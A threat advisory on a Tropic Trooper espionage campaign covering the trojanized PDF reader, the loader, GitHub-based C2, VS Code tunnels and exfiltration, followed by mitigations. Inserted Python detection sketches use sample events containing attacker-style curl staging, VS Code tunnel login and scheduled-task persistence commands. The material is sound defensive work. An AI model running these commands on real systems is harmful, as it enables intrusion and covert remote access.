The China-linked Tropic Trooper APT group (also tracked as APT23, Earth Centaur, KeyBoy, and Pirate Panda) has significantly evolved its tactics, techniques, and procedures by shifting to open-source offensive frameworks in a sophisticated multi-stage intrusion campaign first observed in March 2026. The Tropic Trooper campaign targeted Chinese-speaking individuals in Taiwan, South Korea, Japan, the Philippines, and Hong Kong, focusing on government institutions, military/navy agencies, hospitals, banks, transportation, high-tech, and healthcare sectors on Windows platforms.
The Tropic Trooper attack chain begins with ZIP archives containing military-themed document lures alongside a trojanized SumatraPDF reader that silently deploys the TOSHIS loader malware. The TOSHIS loader fetches encrypted shellcode from Tropic Trooper staging servers and reflectively loads an AdaptixC2 Beacon agent that routes command-and-control traffic through GitHub Issues and repository contents. On high-value targets, Tropic Trooper operators deploy Microsoft Visual Studio Code and establish VS Code tunnels for interactive remote access, representing a significant shift toward abusing legitimate developer tools.
The Tropic Trooper staging infrastructure also hosted Cobalt Strike Beacon bearing the distinctive watermark 520 and the EntryShell custom backdoor using the AES-128 ECB key “afkngaikfaf,” both long-standing hallmarks of Tropic Trooper tradecraft. This evolution demonstrates Tropic Trooper’s strategic pivot to open-source offensive frameworks including AdaptixC2, Visual Studio Code tunnels, and GitHub-based command-and-control infrastructure, making detection more challenging for security teams defending against this China-linked APT group.
Initial Spear-Phishing and Trojanized SumatraPDF Delivery
The China-linked Tropic Trooper APT group launched a sophisticated spear-phishing campaign targeting Chinese-speaking individuals across Taiwan, South Korea, Japan, the Philippines, and Hong Kong. The Tropic Trooper intrusion begins with a ZIP archive delivered to targets that contains a blend of outdated decoy documents alongside one file engineered to lure execution. The weaponized component is an executable: a trojanized copy of the open-source SumatraPDF reader that preserves the legitimate certificate and PDB path but carries an invalidated digital signature.
Execution of the Tropic Trooper payload requires user interaction, consistent with Tropic Trooper’s long-standing preference for socially engineered spearphishing attachments and fake installer files. This Tropic Trooper technique has been documented across the group’s campaigns targeting Taiwan, the Philippines, Hong Kong, and earlier air-gapped military and government environments reached through USBferry infections, demonstrating the continuity of Tropic Trooper’s initial access methods.
TOSHIS Loader and AdaptixC2 Beacon Deployment
Once the trojanized SumatraPDF is launched, the Tropic Trooper malware hijacks the reader's control flow by redirecting a function call into malicious code, a departure from earlier TOSHIS variants that modified the executable entry point directly. The TOSHIS loader constructs stack strings containing the command-and-control address, a destination path for the decoy file, DLL names, and a cryptographic key, then resolves Windows APIs dynamically using Adler-32 hashes to evade detection.
The TOSHIS loader downloads a decoy AUKUS-themed PDF via ShellExecuteW to distract the victim while pulling second-stage shellcode from the same Tropic Trooper staging IP and decrypting it in memory. The decrypted shellcode is an AdaptixC2 Beacon agent that is reflectively loaded into the running process. Tropic Trooper establishes persistence through scheduled tasks created with schtasks /create using names crafted to blend with legitimate services, with triggers configured to run the AdaptixC2 agent on an hourly cadence at the highest run level.
Visual Studio Code Tunnels and Hands-On-Keyboard Operations
After the AdaptixC2 Beacon establishes itself, the Tropic Trooper operators move into a reconnaissance and hands-on-keyboard phase. The Tropic Trooper agent first queries ipinfo.io to learn its external IP before beaconing out through a custom listener that communicates with the threat-actor-controlled GitHub repository. This represents a significant evolution in Tropic Trooper command-and-control infrastructure, abusing GitHub’s legitimate API for malicious communications.
When a victim is assessed as valuable, the Tropic Trooper operators download the Visual Studio Code command-line binary from Microsoft's CDN and invoke "code tunnel user login --provider github", redirecting the device-login output to z.txt to complete authentication and establish an interactive VS Code tunnel for hands-on access. On some hosts, the Tropic Trooper operators additionally install trojanized alternatives such as SunloginDesktopAgent.exe to better camouflage their footprint, and they have been observed staging Roslyn, the open-source .NET compiler, for trusted-developer-utility proxy execution of malicious code.
Data Exfiltration and Attribution to Tropic Trooper
For collection and exfiltration, the Tropic Trooper AdaptixC2 Beacon uses its native fileupload capability to pull arbitrary files from the compromised host and channels all outbound data through the same GitHub API surface used for command delivery. Output is Base64-encoded by Tropic Trooper, split into 30-megabyte parts when necessary, and written as individual files under the repository’s contents tree. Operational security is tight: Tropic Trooper Beacons are deleted within roughly ten seconds of upload to destroy the session keys and prevent passive decryption of captured traffic.
The same Tropic Trooper staging server that hosts the AdaptixC2 shellcode was also observed serving a Cobalt Strike Beacon marked with the watermark 520 and an EntryShell custom backdoor using the AES-128 ECB key “afkngaikfaf,” both of which align with previously documented Tropic Trooper tooling and cement the attribution to this China-linked APT group targeting government, military, healthcare, and financial institutions across East Asia.
Detect Trojanized SumatraPDF and Invalid Code Signatures
Deploy endpoint detection rules that flag SumatraPDF-named binaries whose Authenticode signature is present but cryptographically invalid, and match the file hashes listed in the IoC section of this Tropic Trooper threat advisory. Consider blocking unsigned or revoked-signature executables from executing out of user profile, Downloads, and Temp directories to prevent Tropic Trooper initial access through trojanized applications.
Monitor GitHub API Egress for Beaconing Behavior
Inspect HTTPS traffic to api.github.com for process origins that do not correspond to sanctioned developer tooling or CI agents, especially POSTs to /repos/<owner>/<repo>/issues, PUTs to /repos/<owner>/<repo>/contents, and repeated polling of issues?state=open. Establish a baseline of legitimate GitHub usage per endpoint and alert on deviations, including uploads of base64 blobs larger than a few megabytes, which are indicators of Tropic Trooper AdaptixC2 Beacon exfiltration activity.
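The egress checks above, as an added detection sketch that is not part of the advisory: it parses constructed proxy-log lines (process, method, URL, request bytes), skips processes on an assumed sanctioned list, and flags the Issues POSTs, contents PUTs, repeated open-issue polling and multi-megabyte uploads described here. The log format, the process allow-list, the thresholds and the repository names are assumptions.

```python
import re
from collections import Counter, defaultdict

# Constructed proxy-log lines: "<process> <method> <url> <request-bytes>". The repository
# names, process names and sizes are invented for illustration, not from the advisory.
SAMPLE_LOGS = """\
git.exe POST https://api.github.com/repos/acme/app/issues 900
sumatrapdf.exe GET https://api.github.com/repos/acme-ops/sync/issues?state=open 310
sumatrapdf.exe GET https://api.github.com/repos/acme-ops/sync/issues?state=open 310
sumatrapdf.exe GET https://api.github.com/repos/acme-ops/sync/issues?state=open 310
sumatrapdf.exe POST https://api.github.com/repos/acme-ops/sync/issues 1400
sumatrapdf.exe PUT https://api.github.com/repos/acme-ops/sync/contents/out/part1 6291456
Code.exe GET https://api.github.com/user 200
""".splitlines()

# Assumed per-fleet baseline: processes allowed to reach api.github.com (lower-case image names).
SANCTIONED = {"git.exe", "gh.exe", "code.exe", "runner.listener"}
POLL_THRESHOLD = 3                 # open-issue polls from one process before calling it beaconing
BLOB_THRESHOLD = 2 * 1024 * 1024   # "larger than a few megabytes" for a single contents PUT

LINE_RE = re.compile(r"^(?P<proc>\S+) (?P<method>[A-Z]+) https?://api\.github\.com(?P<path>\S+) (?P<bytes>\d+)$")
ISSUES_RE = re.compile(r"^/repos/[^/]+/[^/]+/issues$")            # POST here creates an issue
CONTENTS_RE = re.compile(r"^/repos/[^/]+/[^/]+/contents/")        # PUT here writes a file blob
POLL_RE = re.compile(r"^/repos/[^/]+/[^/]+/issues\?state=open$")  # repeated GETs = tasking poll

def analyze(lines):
    """Map each non-sanctioned process to the set of GitHub-API behaviours it exhibited."""
    findings = defaultdict(set)
    polls = Counter()
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # not api.github.com traffic, or a line in another format
        proc, method, path, size = m["proc"].lower(), m["method"], m["path"], int(m["bytes"])
        if proc in SANCTIONED:
            continue
        findings[proc].add("unsanctioned-process")
        if method == "POST" and ISSUES_RE.match(path):
            findings[proc].add("issue-create")
        if method == "PUT" and CONTENTS_RE.match(path):
            findings[proc].add("contents-put")
            if size > BLOB_THRESHOLD:
                findings[proc].add("large-upload")
        if method == "GET" and POLL_RE.match(path):
            polls[proc] += 1
            if polls[proc] >= POLL_THRESHOLD:
                findings[proc].add("issue-polling")
    return dict(findings)
```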
Restrict and Audit Visual Studio Code Tunnel Usage
Tropic Trooper weaponizes the legitimate VS Code tunnel feature for interactive remote access. Where VS Code tunnels are not required, block the code.exe CLI from invoking the tunnel command, strip the VS Code CLI binary from standard endpoint images, and alert on any process tree that writes device-login output to files such as z.txt, z2.txt, or files in C:\Users\Public\Documents. Require SSO-enforced GitHub accounts that cannot be authorized from unmanaged devices to prevent Tropic Trooper abuse of VS Code tunnels.
Monitor Suspicious Ingress Tool Transfer
Build detections for cURL invocations downloading from code.visualstudio.com, bashupload[.]app, or any IP-literal HTTP source into user-profile or Public directories, and for mass renaming of downloaded archives to short names such as v.zip. Correlate with Microsoft Defender or AMSI alerts on subsequent shellcode activity to identify Tropic Trooper tool staging and deployment across compromised endpoints.
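The command-line checks from this section and the two before it (VS Code tunnel invocation, device-login output redirected to z.txt or Public\Documents, cURL staging into user-writable paths, short archive names, and the hourly highest-run-level scheduled task from the persistence description), as one added example that is not the advisory's own code. The event format, the user-writable directory pattern, the rule names and the sample events are assumptions and constructed data.

```python
import re

# Constructed process-creation events (image name, command line). Paths, task names and
# the documentation-range IP 203.0.113.7 are placeholders, not telemetry from the advisory.
SAMPLE_EVENTS = [
    ("curl.exe", r"curl.exe -o C:\Users\Public\v.zip https://code.visualstudio.com/download/cli.zip"),
    ("curl.exe", r"curl.exe -o C:\Users\bob\AppData\Local\Temp\a.bin http://203.0.113.7/s"),
    ("cmd.exe", r"cmd.exe /c code tunnel user login --provider github > C:\Users\Public\Documents\z.txt"),
    ("code.exe", r"code tunnel"),
    ("schtasks.exe", r'schtasks /create /tn "Windows Update Sync" /tr C:\Users\Public\up.exe /sc hourly /rl highest /f'),
    ("curl.exe", r"curl.exe -o C:\build\tools.zip https://updates.corp.example/tools.zip"),
    ("schtasks.exe", r"schtasks /query /tn Backup"),
]

# Assumed "user-writable" destinations: Public profile, Downloads, or per-user Temp.
USER_DIR = r"\\Users\\(?:Public|[^\\]+\\(?:Downloads|AppData\\Local\\Temp))\\"
OUT_RE = re.compile(r'(?:-o|--output)\s+"?(?P<dest>[^\s"]+)', re.I)
URL_RE = re.compile(r"https?://(?P<host>[^/\s:]+)", re.I)
IP_RE = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}$")
STAGING_HOSTS = {"code.visualstudio.com", "bashupload.app"}   # from the advisory (re-fanged)

def classify(image, cmdline):
    """Return the set of rule names an event matches; an empty set means no finding."""
    hits, low = set(), cmdline.lower()
    if image.lower() == "curl.exe":
        out, url = OUT_RE.search(cmdline), URL_RE.search(cmdline)
        host = url["host"].lower() if url else ""
        if out and re.search(USER_DIR, out["dest"], re.I) and (host in STAGING_HOSTS or IP_RE.match(host)):
            hits.add("ingress-tool-transfer")      # staging a download into a user-writable path
        if out and re.search(r"\\[a-z0-9]{1,2}\.(?:zip|7z|rar)$", out["dest"], re.I):
            hits.add("short-archive-name")         # v.zip-style renamed archive
    if re.search(r"\bcode(?:\.exe)?\s+tunnel\b", low):
        hits.add("vscode-tunnel")
        if "user login" in low and re.search(r">\s*\S*(?:\\z\d*\.txt|public\\documents\\)", low):
            hits.add("device-login-redirect")      # device-code output written to z.txt etc.
    if image.lower() == "schtasks.exe" and "/create" in low and "/sc hourly" in low and "/rl highest" in low:
        hits.add("hourly-highest-task")            # persistence pattern from the TOSHIS section
    return hits

def scan(events):
    """Return [(image, sorted rule names)] for every event with at least one finding."""
    out = []
    for image, cmdline in events:
        hits = classify(image, cmdline)
        if hits:
            out.append((image, sorted(hits)))
    return out
```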
MITRE ATT&CK tactics mapped in this advisory: Resource Development, Initial Access, Execution, Persistence, Defense Evasion, Discovery, Collection, Command and Control, Exfiltration.
Indicators of Compromise (IPv4 addresses, domains, URLs, SHA256 hashes)